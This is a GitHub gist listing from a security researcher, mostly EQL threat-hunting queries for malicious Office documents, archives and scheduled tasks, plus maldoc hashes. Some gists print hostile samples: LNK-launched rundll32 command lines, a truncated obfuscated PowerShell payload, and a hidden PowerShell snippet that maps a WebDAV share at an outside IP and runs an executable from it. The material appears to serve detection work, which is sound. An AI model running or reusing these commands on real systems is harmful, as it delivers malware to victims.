Skip to content

Instantly share code, notes, and snippets.

View Samirbous's full-sized avatar

Samirbous

42 followers · 19 following
View GitHub Profile
@Samirbous
Samirbous / eql hunt recent svc or task
Created September 7, 2022 14:28
process where event.action == "start" and
(
(process.parent.name : "svchost.exe" and process.parent.args : "schedule") or
process.parent.name : "services.exe"
)
and
(process.Ext.relative_file_creation_time < 300 or process.Ext.relative_file_name_modify_time < 300)
@Samirbous
Samirbous / mal_lnk
Created September 6, 2022 15:31
"Top 1000 values of process.executable","Top 1000 values of process.command_line","Top 1000 values of process.working_directory","Count of records"
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Program Files (x86)""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Windows""","C:\Users\user\Desktop\",8
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""ProgramData""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Recovery""","C:\Users\user\Desktop\",7
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Documents and Settings""","C:\Users\user\Desktop\",11
"C:\Windows\System32\rundll32.exe
@Samirbous
Samirbous / tiest
Created August 23, 2022 20:03
This file has been truncated, but you can view the full file.
$iWli=('011K110,01110101,01101110,011K011,011101K,01101K1,01101111,01101110,K1KK0,011101K,01K1101,01KK11,011K110,01101011,0101K11,01K01K,K1KK0,01111011,KK1101,KK1010,KK1101,KK1010,KK1K1,01011011,01KK11,01101101,011K1K,011011K,011K101,011101K,01KK10,01101K1,01101110,011K1K,01101K1,01101110,011K111,K101K0,K101K1,01011101,KK1101,KK1010,K1KK0,K1KK0,K1KK0,K1KK0,0101KK,011KK1,0111K10,011KK1,01101101,K1KK0,K101K0,01011011,011K010,01111K1,011101K,011K101,01011011,01011101,01011101,K1KK0,K1K1K,011K010,01111K1,011101K,011K101,01KK01,0111K10,0111K10,011KK1,01111K1,K101K1,KK1101,KK1010,K1KK0,KK1101,KK1010,KK1K1,0101KK,0111K10,01101111,011K011,011K101,0111K11,0111K11,K1KK0,01111011,KK1101,KK1010,KK1K1,K1KK0,K1KK0,K1KK0,K1KK0,K1K1K,011K111,01101011,011K1K,011K110,K111101,K101K0,K1K111,K101K0,01011011,01K1K1,01K1111,K101110,01KK11,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,01101K1,01101111,01101110,K101110,01KK11,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,01101K1,01101111,01101110,01K1101,0110111
@Samirbous
Samirbous / gist:2e9a84f56bd6e7ee2da2da2e743f65cf
Created July 30, 2022 19:41
sequence with maxspan=1m
[file where event.action != "deletion" and
file.extension : "doc*" and
/* xml or mht file header renamed as doc smuggling maldoc */
file.Ext.header_bytes : ("3c3f786d6c2076657273696f6e*", "4d494d452d56657273696f6e3a*") and
process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE")] by process.entity_id
[process where event.action == "start" and
process.parent.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE")] by process.parent.entity_id
@Samirbous
Samirbous / suspicious office child http cache
Created June 2, 2022 21:34
sequence with maxspan=30s
[registry where process.name : "winword.exe" and
registry.path : "HKEY_USERS\\*\\Software\\Microsoft\\Office\\*\\Common\\Internet\\Server Cache\\https*"] by process.entity_id
[file where event.action == "creation" and
file.path : "?:\\Users\\*\\AppData\\*\\Content.MSO\\*" and process.name : "winword.exe" and
file.extension : "htm*" and file.size >= 4096] by process.entity_id
[process where event.action == "start" and process.parent.name : "winword.exe" and
not process.name : ("splwow64.exe", "DWWIN.EXE", "WerFault.exe")] by process.parent.entity_id
@Samirbous
Samirbous / 85829b792aa3a5768de66beacdb0a0ce
Created June 1, 2022 17:40
$cmd="C:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c net use z: \\5.206.224.233\webdav\ /user:user
`$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete ";
@Samirbous
Samirbous / dir traversal office
Created May 31, 2022 15:05
process where event.type in ("start", "process_started") and
process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe") and
/* u can add other dir traversal patterns here */
process.command_line : ("*../../../..*", "*..\\..\\..\\..*", "*..//..//..//..*") and
process.executable : ("?:\\windows\\system32\\*.exe", "?:\\Windows\\SysWOW64\\*.exe")
@Samirbous
Samirbous / maldoc hashes
Created May 28, 2022 17:00
76f7247dcb2f7dfb50a21eb9fe35a55a
fea98f3eb09ddfc5686d45c91ed887fd
d3b8822c5107aaeb1704dcdea673eeb0
d4d738c7d917261c6b504de932fc36ec
d0ee5895a471bdeafcb5a1d759ff3879
759e2d7e3820770f2ed1e95f4207242f
e641c2fb4b71b12e4f7abae53d89a5a8
9bf5a424d33fc007310d18255e053986
e3ca32ebe9b538cd74bafeb6aa0440f5
2ce0a4bc8db0f54d6b0b8d681f42bb5b
@Samirbous
Samirbous / EQL - exec from pwd protected archive
Created May 9, 2022 20:35
sequence by host.id with maxspan=1m
[process where process.name : ("7zG.exe", "WinRAR.exe") and not process.args : "a"] by process.pid
[registry where process.name : ("7zG.exe", "WinRAR.exe") and registry.value : "ShowPassword" and registry.data.strings : "0"] by process.pid
[process where event.action == "start" and process.parent.name : ("7zG.exe", "WinRAR.exe")] by process.parent.pid
@Samirbous
Samirbous / EQL - Exec pwd protected zip
Created May 8, 2022 19:36
sequence by host.id with maxspan=1m
[any where event.code : "5379" and winlog.event_data.TargetName : "Microsoft_Windows_Shell_ZipFolder*"]
[process where event.action == "start" and process.executable : "?:\\Users\\*\\Appdata\\Local\\Temp\\Temp?_*" and process.parent.name : "explorer.exe"]